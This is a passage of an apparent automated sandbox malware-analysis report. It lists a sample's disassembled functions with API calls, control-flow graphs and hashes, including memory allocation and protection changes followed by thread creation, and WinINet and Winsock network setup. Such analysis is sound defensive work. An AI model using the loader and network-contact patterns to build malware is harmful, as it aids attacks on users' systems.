                              • Part of subcall function 00DBCB1C: _malloc.LIBCMT ref: 00DBCB71
                              • Part of subcall function 00DBCB1C: _memset.LIBCMT ref: 00DBCB8F
                              • Part of subcall function 00DBCB1C: _strtok.LIBCMT ref: 00DBCBB4
                              • Part of subcall function 00DBCB1C: _strtok.LIBCMT ref: 00DBCBE6
                              • Part of subcall function 00DB5C3E: __time64.LIBCMT ref: 00DB5C4B
                              • Part of subcall function 00DBEA37: _malloc.LIBCMT ref: 00DBEA5E
                              • Part of subcall function 00DBEA37: _memset.LIBCMT ref: 00DBEA8C
                              • Part of subcall function 00DBEA37: _realloc.LIBCMT ref: 00DBEA6D
                            • _malloc.LIBCMT ref: 00DB1486
                            • __snprintf.LIBCMT ref: 00DB14E8
                            • __snprintf.LIBCMT ref: 00DB1507
                            • __snprintf.LIBCMT ref: 00DB1525
                              • Part of subcall function 00DBDE47: Sleep.KERNEL32(000003E8,00000000,00000000,00000080,00DB16C4), ref: 00DBDE84
                              • Part of subcall function 00DBDE47: ExitThread.KERNEL32 ref: 00DBDE8E
                              • Part of subcall function 00DB273C: InternetOpenA.WININET(00DB1572,00000003,00000000,00000000,00000000), ref: 00DB27C2
                              • Part of subcall function 00DB273C: InternetSetOptionA.WININET(00000005,0003A980,00000004), ref: 00DB27E1
                              • Part of subcall function 00DB273C: InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 00DB27F1
                              • Part of subcall function 00DB273C: InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00DEFFC4), ref: 00DB2809
                              • Part of subcall function 00DB273C: InternetSetOptionA.WININET(00000000,0000002B,00000000,00000000), ref: 00DB283A
                              • Part of subcall function 00DB273C: InternetSetOptionA.WININET(0000002C,00000000,00000000), ref: 00DB2856
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet_malloc$Option$__snprintf$__time64_memset_strtok$AllocateConnectExitHeapOpenSleepThread_realloc
                            • String ID:
                            • API String ID: 3506699640-0
                            • Opcode ID: 4f1505f5c13b54573ad0c605ce982d1566c7931be01a99d8a4d9f60f99c0f9bd
                            • Instruction ID: 2900882603d310469d0f331e603811e01a76a3789d9b1a831688a1f04d05f448
                            • Opcode Fuzzy Hash: 4f1505f5c13b54573ad0c605ce982d1566c7931be01a99d8a4d9f60f99c0f9bd
                            • Instruction Fuzzy Hash: 08911472904301EBD6207B759C03FEF77E5EF84760F580919F586AA1D2EE71C9009AB6
                            Function 00DB131C Relevance: 7.8, APIs: 5, Instructions: 308COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 365 db131c-db1427 call db81bc call db8382 * 3 call dbc2f3 call dbc2dd call dbc2e8 call dbc2f3 * 2 call dc87ff call dbc2e8 * 3 call dbc2dd call dbcb1c call db5c3e call dbea37 * 2 call db386e 404 db1429 call dbde47 365->404 405 db142e-db1441 call dbc2e8 call db38b1 365->405 404->405 411 db1448-db144f call db38cc 405->411 412 db1443 call dbde47 405->412 416 db1451 call dbde47 411->416 417 db1456-db145d call db3927 411->417 412->411 416->417 421 db145f call dbde47 417->421 422 db1464-db1494 call dbc2dd call dbc2e8 call dc87ff 417->422 421->422 430 db149b-db14c6 call dbc2e8 call dbea37 call dbc2e8 call db8060 422->430 431 db1496 call dbde47 422->431 441 db14c7-db14c8 430->441 431->430 442 db14ce-db153e call dbcdfa call dc8956 call dbcdfa call dc8956 * 2 call db5c6a 441->442 443 db16ac-db16ca call dbcea0 call dc8722 call dbde47 441->443 462 db155f-db1592 call db273c call dbc2e8 call db2e3d 442->462 463 db1540-db1545 442->463 475 db15bd-db15c0 462->475 476 db1594-db15a2 call dbbcc5 462->476 465 db1548-db154d 463->465 465->465 467 db154f-db1551 465->467 467->462 468 db1553-db155e call db6072 467->468 468->462 477 db1628 475->477 478 db15c2-db15d1 call db8fa1 call dbc2e8 475->478 484 db15b2-db15b5 476->484 485 db15a4-db15b0 call dba36c 476->485 482 db1630-db163c call db2874 call db386e 477->482 494 db15da 478->494 495 db15d3-db15d8 478->495 496 db163e call dbde47 482->496 497 db1643-db1657 call dbce28 482->497 484->475 485->475 498 db15df-db15f6 call db4f55 call db7853 call db7017 call db386e 494->498 495->498 496->497 504 db1659 call dbde47 497->504 505 db165e-db1666 497->505 524 db15f8 call db2fb7 498->524 525 db15fd-db1604 498->525 504->505 505->443 508 db1668-db166f 505->508 510 db169a-db169b call db54a0 508->510 511 db1671-db167f 508->511 519 db16a0-db16a7 510->519 514 db1692 511->514 515 db1681-db1690 call db300f 511->515 517 db1694-db1696 514->517 515->517 517->510 521 db1698 517->521 519->441 521->510 524->525 525->482 527 db1606-db1626 call db2874 call db273c call db2962 525->527 527->482
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • _malloc.LIBCMT ref: 00DB13B2
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00DEFFA0,?,00DB106E,00004008,?,?,?,?,00000003,?,70207369), ref: 00DC8876
                              • Part of subcall function 00DBCB1C: __time64.LIBCMT ref: 00DBCB28
                              • Part of subcall function 00DBCB1C: _malloc.LIBCMT ref: 00DBCB71
                              • Part of subcall function 00DBCB1C: _memset.LIBCMT ref: 00DBCB8F
                              • Part of subcall function 00DBCB1C: _strtok.LIBCMT ref: 00DBCBB4
                              • Part of subcall function 00DBCB1C: _strtok.LIBCMT ref: 00DBCBE6
                              • Part of subcall function 00DBEA37: _malloc.LIBCMT ref: 00DBEA5E
                              • Part of subcall function 00DBEA37: _memset.LIBCMT ref: 00DBEA8C
                              • Part of subcall function 00DBEA37: _realloc.LIBCMT ref: 00DBEA6D
                            • _malloc.LIBCMT ref: 00DB1486
                            • __snprintf.LIBCMT ref: 00DB14E8
                            • __snprintf.LIBCMT ref: 00DB1507
                            • __snprintf.LIBCMT ref: 00DB1525
                              • Part of subcall function 00DBDE47: Sleep.KERNEL32(000003E8,00000000,00000000,00000080,00DB16C4), ref: 00DBDE84
                              • Part of subcall function 00DBDE47: RtlExitUserThread.NTDLL(00000000,00000000,00000000,00000080,00DB16C4), ref: 00DBDE8E
                              • Part of subcall function 00DBDE47: WaitForSingleObject.KERNEL32(00000000,00000000,00000080,00DB16C4), ref: 00DBDEAF
                              • Part of subcall function 00DB273C: InternetOpenA.WININET(00DB1572,00000003,00000000,00000000,00000000), ref: 00DB27C2
                              • Part of subcall function 00DB273C: InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00DEFFC4), ref: 00DB2809
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$__snprintf$Internet_memset_strtok$AllocateConnectExitHeapObjectOpenSingleSleepThreadUserWait__time64_realloc
                            • String ID:
                            • API String ID: 431395496-0
                            • Opcode ID: 785c1a1f2b65c52826bdb9a5481cb86a1e9d5777b189bfa056c66138993a9795
                            • Instruction ID: 2900882603d310469d0f331e603811e01a76a3789d9b1a831688a1f04d05f448
                            • Opcode Fuzzy Hash: 785c1a1f2b65c52826bdb9a5481cb86a1e9d5777b189bfa056c66138993a9795
                            • Instruction Fuzzy Hash: 08911472904301EBD6207B759C03FEF77E5EF84760F580919F586AA1D2EE71C9009AB6
                            Function 0040156C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47memorythreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 534 40156c-40159d VirtualAlloc 535 40159f-4015a1 534->535 536 4015a3-4015b8 535->536 537 4015ba-40161b call 401539 VirtualProtect CreateThread 535->537 536->535
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: Virtual$AllocCreateProtectThread
                            • String ID:
                            • API String ID: 3039780055-3916222277
                            • Opcode ID: 7116a479f18e8398ab62b384885a83961a77cbf5e6f43067b0417bc4564eeb7b
                            • Instruction ID: e62f9da5006a8b60ac6d7aa8aa559fb842e3793d0c2f75f38c45ec490f2c7fc1
                            • Opcode Fuzzy Hash: 7116a479f18e8398ab62b384885a83961a77cbf5e6f43067b0417bc4564eeb7b
                            • Instruction Fuzzy Hash: FD1148B0408304AFD700AF25C48835EBFF4EB88358F40C86EE9998B391D37984098B92
                            Function 00401296 Relevance: 5.1, APIs: 4, Instructions: 79stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 583 401296-4012a2 585 4012a4 583->585 586 4012b8-4012c5 583->586 588 4012a8-4012b1 585->588 589 4012c7-4012d0 586->589 590 4012db-4012fb malloc 586->590 588->586 591 4012b3-4012b6 588->591 592 4012d6 589->592 593 4013b8-4013bc 589->593 594 401301-40130d 590->594 595 401483 590->595 591->586 591->588 592->590 593->592 596 401310-401344 strlen malloc memcpy 594->596 597 40148b-40149a exit 595->597 596->596 598 401346-401393 call 401960 call 4029e0 596->598 598->597 603 401399-4013a1 598->603 604 4013a7-4013b2 603->604 605 401448-40145d _cexit 603->605
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: malloc$memcpystrlen
                            • String ID:
                            • API String ID: 3553820921-0
                            • Opcode ID: 948a088ca798df2e7dce449238bcaf35f26902c4bc7ea522de66c663b67a1438
                            • Instruction ID: 2b272e4b46966ba8deed0fafeb192a19a89914a185c4b83b395d914033f718ae
                            • Opcode Fuzzy Hash: 948a088ca798df2e7dce449238bcaf35f26902c4bc7ea522de66c663b67a1438
                            • Instruction Fuzzy Hash: CB3136B9A003058FCB10DF65E98075ABBF1FB44705F14853ED988A73A2E778E945CB89
                            Function 004013B3 Relevance: 5.1, APIs: 4, Instructions: 65stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 606 4013b3-4013bc malloc 610 401301-40130d 606->610 611 401483 606->611 612 401310-401344 strlen malloc memcpy 610->612 613 40148b-40149a exit 611->613 612->612 614 401346-401393 call 401960 call 4029e0 612->614 614->613 619 401399-4013a1 614->619 620 4013a7-4013b2 619->620 621 401448-40145d _cexit 619->621
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: malloc$memcpystrlen
                            • String ID:
                            • API String ID: 3553820921-0
                            • Opcode ID: f5e0c9adc78a94dab72ef4a8ccb92d4597cac7524235f195ea0d1421677b0eb4
                            • Instruction ID: 9b3cccf6e9dd94e7ac684493c2e87501ce7787e5f0140ca7f17ca5cac32b3744
                            • Opcode Fuzzy Hash: f5e0c9adc78a94dab72ef4a8ccb92d4597cac7524235f195ea0d1421677b0eb4
                            • Instruction Fuzzy Hash: EF2112B8A003058FCB10DF69E880659BBF0FB48705F10843ED988A73A2E774A945CB89
                            Function 00DB2F1B Relevance: 4.6, APIs: 3, Instructions: 68networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DB2E6E: WSAStartup.WS2_32(00000202,?), ref: 00DB2E8F
                              • Part of subcall function 00DB2E6E: WSACleanup.WS2_32 ref: 00DB2E99
                            • WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 00DB2F3F
                            • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,?,00000000,00000000), ref: 00DB2F6A
                            • closesocket.WS2_32(00000000), ref: 00DB2FA9
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CleanupIoctlSocketStartupclosesocket
                            • String ID:
                            • API String ID: 1100289767-0
                            • Opcode ID: 25a1cade9d9a1ec90bc3a16f961ffc886d68abec4331356a4ef07da50ac2384b
                            • Instruction ID: 5537fc31ffa5fbb0ac09be44264f8c8655e5644c8ff41f871c4d478a3134d972
                            • Opcode Fuzzy Hash: 25a1cade9d9a1ec90bc3a16f961ffc886d68abec4331356a4ef07da50ac2384b
                            • Instruction Fuzzy Hash: 37119472601218FBD7208A669C49EFF7F7DDF89760F148026F90AD6180D670884186B0
                            Function 00DB2F1B Relevance: 4.6, APIs: 3, Instructions: 68networkCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DB2E6E: WSAStartup.WS2_32(00000202,?), ref: 00DB2E8F
                              • Part of subcall function 00DB2E6E: WSACleanup.WS2_32 ref: 00DB2E99
                            • WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 00DB2F3F
                            • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,00000001,00000000,00000000), ref: 00DB2F6A
                            • closesocket.WS2_32(00000000), ref: 00DB2FA9
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CleanupIoctlSocketStartupclosesocket
                            • String ID:
                            • API String ID: 1100289767-0
                            • Opcode ID: 25a1cade9d9a1ec90bc3a16f961ffc886d68abec4331356a4ef07da50ac2384b
                            • Instruction ID: 5537fc31ffa5fbb0ac09be44264f8c8655e5644c8ff41f871c4d478a3134d972
                            • Opcode Fuzzy Hash: 25a1cade9d9a1ec90bc3a16f961ffc886d68abec4331356a4ef07da50ac2384b
                            • Instruction Fuzzy Hash: 37119472601218FBD7208A669C49EFF7F7DDF89760F148026F90AD6180D670884186B0
                            Function 00401700 Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleRead
                            • String ID:
                            • API String ID: 1035965006-0
                            • Opcode ID: de8e7562ff60837e5b68acacff60a59f894b3ed398b1beaf9885a2a007807793
                            • Instruction ID: 13578ad0072e5758c11d0cf9d06b5e6b01679b076f79182928bb53a60008478f
                            • Opcode Fuzzy Hash: de8e7562ff60837e5b68acacff60a59f894b3ed398b1beaf9885a2a007807793
                            • Instruction Fuzzy Hash: 811157B58083059FC700AF29C54835FBBF4EF84364F00892EE895973A2D3B989498FD6
                            Function 00DB81BC Relevance: 4.5, APIs: 3, Instructions: 35COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • _malloc.LIBCMT ref: 00DB81D2
                            • _memset.LIBCMT ref: 00DB81EF
                              • Part of subcall function 00DC8722: __lock.LIBCMT ref: 00DC8740
                              • Part of subcall function 00DC8722: ___sbh_find_block.LIBCMT ref: 00DC874B
                              • Part of subcall function 00DC8722: ___sbh_free_block.LIBCMT ref: 00DC875A
                              • Part of subcall function 00DC8722: HeapFree.KERNEL32(00000000,00000000,00DE35A0,0000000C,00DCD788,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C), ref: 00DC878A
                              • Part of subcall function 00DC8722: GetLastError.KERNEL32(?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5,00000000,00000000,?,00DCD842,0000000D), ref: 00DC879B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap_malloc$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock_memset
                            • String ID:
                            • API String ID: 1561657895-0
                            • Opcode ID: 21c09f07a7fc623b024758759923ff1919fe7979f59a699eda9de8700b3a409b
                            • Instruction ID: de32f74f57f46cff3beaf29c09f2abf442923637fd7502bddcc99bb98b62617b
                            • Opcode Fuzzy Hash: 21c09f07a7fc623b024758759923ff1919fe7979f59a699eda9de8700b3a409b
                            • Instruction Fuzzy Hash: ACE06D3B601516B6CA22396AEC02FDE2E1ECF827F0F24402DF9095A181EE118901B6F9
                            Function 004017AC Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 26sleepCOMMON
                            Download Yara Rule
                            APIs
                            • malloc.MSVCRT ref: 004017BB
                            • Sleep.KERNELBASE ref: 004017C9
                              • Part of subcall function 00401700: CreateFileA.KERNELBASE ref: 0040174D
                              • Part of subcall function 00401700: ReadFile.KERNELBASE ref: 0040177D
                              • Part of subcall function 00401700: CloseHandle.KERNEL32 ref: 0040178D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleReadSleepmalloc
                            • String ID: (0@
                            • API String ID: 4248373497-1619376425
                            • Opcode ID: 6845ea8dd48fab404a2061b438f8f23c871c7f7415dcaaf50ff1d80553ea92f3
                            • Instruction ID: c18dacc817dc4ff119a69da04305d567d0d6ae5b32f5fd65705d0832059cd44e
                            • Opcode Fuzzy Hash: 6845ea8dd48fab404a2061b438f8f23c871c7f7415dcaaf50ff1d80553ea92f3
                            • Instruction Fuzzy Hash: 9AF0F8B4A053009BC700EF7ADA8551ABBE8BB08345F41483DA684E7391D678D9008B1A
                            Function 00DB273C Relevance: 3.1, APIs: 2, Instructions: 115networkCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • InternetOpenA.WININET(00DB1572,00000003,00000000,00000000,00000000), ref: 00DB27C2
                            • InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00DEFFC4), ref: 00DB2809
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$ConnectOpen
                            • String ID:
                            • API String ID: 2790792615-0
                            • Opcode ID: bc5d1b1292c3f0a894aa750e7b114b9efee42ba26fc7c7c60338216f23b59ba3
                            • Instruction ID: 5e353c7e07c26f5a540faeb86b22f755710cfb2533c092586ffec43f39df2e5b
                            • Opcode Fuzzy Hash: bc5d1b1292c3f0a894aa750e7b114b9efee42ba26fc7c7c60338216f23b59ba3
                            • Instruction Fuzzy Hash: 9831C272590384FAEA313B61AC4AFFB3F29EB81B14F10502AF602DD1D1DE758A45C678
                            Function 00DB2E6E Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WS2_32(00000202,?), ref: 00DB2E8F
                            • WSACleanup.WS2_32 ref: 00DB2E99
                              • Part of subcall function 00DC8EDE: _doexit.LIBCMT ref: 00DC8EEA
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CleanupStartup_doexit
                            • String ID:
                            • API String ID: 3413891862-0
                            • Opcode ID: 5b9e8fc7d34bea40ff451a5d89123b516c91c3fbdfe955e177f3adb29d39a447
                            • Instruction ID: ecfbd1b97adc84e6d1c8cb979d47dc273230d4655a03df8f9a9984fc56ff6b63
                            • Opcode Fuzzy Hash: 5b9e8fc7d34bea40ff451a5d89123b516c91c3fbdfe955e177f3adb29d39a447
                            • Instruction Fuzzy Hash: FD016171D41355D6D7186FB4BC467E47AA4FB06B10F04412BB105DA2D5DB708285CBB8
                            Function 00DB2E6E Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • WSAStartup.WS2_32(00000202,?), ref: 00DB2E8F
                            • WSACleanup.WS2_32 ref: 00DB2E99
                              • Part of subcall function 00DC8EDE: _doexit.LIBCMT ref: 00DC8EEA
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CleanupStartup_doexit
                            • String ID:
                            • API String ID: 3413891862-0
                            • Opcode ID: 72f3096b343d7d08960cfb8a19a7e486d81590be9de46aa9126aa7b10bb28443
                            • Instruction ID: ecfbd1b97adc84e6d1c8cb979d47dc273230d4655a03df8f9a9984fc56ff6b63
                            • Opcode Fuzzy Hash: 72f3096b343d7d08960cfb8a19a7e486d81590be9de46aa9126aa7b10bb28443
                            • Instruction Fuzzy Hash: FD016171D41355D6D7186FB4BC467E47AA4FB06B10F04412BB105DA2D5DB708285CBB8
                            Function 00DC0CD9 Relevance: 1.8, APIs: 1, Instructions: 257COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _calloc.LIBCMT ref: 00DC0D3B
                              • Part of subcall function 00DD6990: __calloc_impl.LIBCMT ref: 00DD69A5
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __calloc_impl_calloc
                            • String ID:
                            • API String ID: 2108883976-0
                            • Opcode ID: 05b948c874dc6b62188192750fbe821c3d408f1b7344a58cdf1efc24f4b1b5ee
                            • Instruction ID: 03b8fa163dcd1e1ce6e6bd9b29f3f4e6b10120fe73e4971ca5e0e286a6074a34
                            • Opcode Fuzzy Hash: 05b948c874dc6b62188192750fbe821c3d408f1b7344a58cdf1efc24f4b1b5ee
                            • Instruction Fuzzy Hash: 41A115B5900209EFDB219F94CC45FAEBBBAFF89300F208559F545AB261D7719A90DF20
                            Function 00D7A300 Relevance: 1.6, APIs: 1, Instructions: 132libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00D79E14,AAAABBBB,?,?,?,?), ref: 00D7A36B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 921837ef3eb67de63abac7cb5666c735ab802cdd6b7f1449a49ae73ad87c3da8
                            • Instruction ID: 0f968b530b6514febcc110c2235b0197f593c47b9fef1f3f649f40f181776f33
                            • Opcode Fuzzy Hash: 921837ef3eb67de63abac7cb5666c735ab802cdd6b7f1449a49ae73ad87c3da8
                            • Instruction Fuzzy Hash: 0051B8B5A00119DFCF08CF98C890AAEB7B2FF88304F148159E9196B351D735AE51CFA5
                            Function 00DBA802 Relevance: 1.6, APIs: 1, Instructions: 70memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • HeapDestroy.KERNEL32(?), ref: 00DBA874
                              • Part of subcall function 00DBC67F: _memset.LIBCMT ref: 00DBC69D
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: DestroyHeap_memset
                            • String ID:
                            • API String ID: 3970643317-0
                            • Opcode ID: f580c0153c6ea08a317772fc41a0e09d1e0d259b418286253bddedf0e48b1f1e
                            • Instruction ID: f365775e7db2f8078117058d30f962a18f8f913eaebfe52c106a6c2185ad93c1
                            • Opcode Fuzzy Hash: f580c0153c6ea08a317772fc41a0e09d1e0d259b418286253bddedf0e48b1f1e
                            • Instruction Fuzzy Hash: 7011A33A910205DFDB24AB2CD881EFE77A9EF11324F588026E40396951EB35DD83D6F6
                            Function 00DC3EF7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00DC3EFE
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
